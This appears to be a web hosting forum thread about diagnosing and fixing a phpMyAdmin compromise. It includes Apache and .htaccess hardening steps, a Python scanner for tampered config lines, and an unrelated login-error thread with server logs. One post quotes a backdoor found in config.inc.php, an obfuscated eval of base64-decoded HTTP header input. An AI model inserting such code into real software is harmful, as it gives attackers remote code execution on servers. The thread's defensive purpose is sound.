Due to the nature of the attack, I think chown to root and chmod to 444 will do the trick. What do you think?
Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit. If you want to feel more secure.. you can do this:

Code:
nano /usr/share/phpmyadmin/.htaccess

Paste:

Code:
<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>

and save. Try to access your file: http://www.yourdomain/phpmyadmin/config.inc.php
White page = Not ok.
403 Forbidden = Great!
I did already add the .htaccess to it today, but now I also deleted the /scripts dir. How should the line in /var/lib/phpmyadmin/config.inc.php look? The phpinfo(); part does not look correct!
My line has been changed for some reason. It now reads:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';

Whatta heck?? I lost my original config file now. How could I get it back?
By the way, the only valid line in /var/lib/phpmyadmin/config.inc.php is now: $i = 0; And phpmyadmin works without problems again.
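A detection sketch for the tampered line quoted above, as an added example that is not part of the original thread: it scans the text of a config.inc.php for calls hidden by string concatenation, reads of request headers, and `$cfg` lines that are not plain assignments. The function name, the list of flagged calls and the sample file are assumptions made for the example.

```python
import re

# Calls that have no place in a phpMyAdmin config file (this list is an assumption).
DANGEROUS = ("eval", "base64_decode", "assert", "system", "shell_exec", "passthru")
# Quote-dot-quote between two literals; deleting it rejoins 'bas'.'e64_dec'.'ode'.
CONCAT = re.compile(r"""['"]\s*\.\s*['"]""")
# Values the HTTP client controls, e.g. the request header in $_SERVER['HTTP_X_CODE'].
REQUEST_INPUT = re.compile(r"""\$_(?:SERVER\s*\[\s*['"]HTTP_|GET|POST|REQUEST|COOKIE)""")
# A plain setting: $cfg['a'][$i]['b'] = <value containing no ';'>;
CLEAN_CFG = re.compile(r"""^\$cfg(?:\[(?:'[\w-]+'|"[\w-]+"|\$i|\d+)\])+\s*=[^;]*;\s*$""")

# Constructed sample: three ordinary lines plus the tampered line quoted in the thread.
SAMPLE = r"""<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';
"""


def scan_config(text):
    """Return (line_number, reason) findings for the text of a config.inc.php."""
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("//", "#", "/*", "*")):
            continue  # blank lines and comments
        joined = CONCAT.sub("", line)  # undo 'a'.'b' splitting before matching
        for name in DANGEROUS:
            if re.search(r"\b" + name + r"\b", joined):
                note = "" if name in line else " (split across string literals)"
                findings.append((number, name + note))
        if REQUEST_INPUT.search(line):
            findings.append((number, "reads client-controlled request data"))
        if line.startswith("$cfg") and not CLEAN_CFG.match(line):
            findings.append((number, "setting line is not a plain assignment"))
    return findings


if __name__ == "__main__":
    for number, reason in scan_config(SAMPLE):
        print(f"line {number}: {reason}")
```

A legitimate value that contains a semicolon also trips the plain-assignment check, so treat that finding as a prompt to read the line rather than as proof of tampering.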
The /usr/share/phpmyadmin/scripts directory was recreated after the update. The .htaccess in /usr/share/phpmyadmin/ is not working for me; I got a white page only. I edited /etc/phpmyadmin/apache.conf and now I get 403 Forbidden.

Code:
# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
    Options Indexes FollowSymLinks
    DirectoryIndex index.php

    # Added (highlighted in red in the original post): deny web access to config.inc.php
    <Files config.inc.php>
        Order allow,deny
        Deny from all
    </Files>

    # Authorize for setup
    <Files setup.php>
        # Added (highlighted in red in the original post): deny web access to setup.php
        Order allow,deny
        Deny from all

        # For Apache 1.3 and 2.0
        <IfModule mod_auth.c>
            AuthType Basic
            AuthName "phpMyAdmin Setup"
            AuthUserFile /etc/phpmyadmin/htpasswd.setup
        </IfModule>
        # For Apache 2.2
        <IfModule mod_authn_file.c>
            AuthType Basic
            AuthName "phpMyAdmin Setup"
            AuthUserFile /etc/phpmyadmin/htpasswd.setup
        </IfModule>
        Require valid-user
    </Files>

    <IfModule mod_php4.c>
        AddType application/x-httpd-php .php
        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_value include_path .
    </IfModule>
    <IfModule mod_php5.c>
        AddType application/x-httpd-php .php
        php_flag magic_quotes_gpc Off
        php_flag track_vars On
        php_flag register_globals Off
        php_value include_path .
    </IfModule>
</Directory>

You need to reload or restart Apache after the edit:

Code:
/etc/init.d/apache2 reload

or

/etc/init.d/apache2 restart
Cookies

I also had that error "1045 - Access denied for user" when trying to login to phpMyAdmin after modifying a database username through ISPConfig. In my case, it wasn't that past phpMyAdmin vulnerability, and simply deleting cookies solved it. Anyhow, it's advisable to follow this howto or similar: Protect phpMyAdmin On An ISPConfig 3 Server (Debian)
#1045 Cannot log in to the MySQL server

Hi, I've installed ISPconfig3 on Debian Squeeze on a dedicated server with 3 available IPs and everything works fine except for phpmyadmin. When I create a database I can access phpmyadmin from the ISPconfig panel by clicking the connection to phpmyadmin from the sites/database interface, but I cannot login with the username and password I just set up. I can login to mysql server from command line by doing -u root -p so mysql server is running. Any ideas how to start fault tracing?
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#

If I run show databases; from mysql command line logged in via SSH I can see the databases that I make in ISPconf3 panel,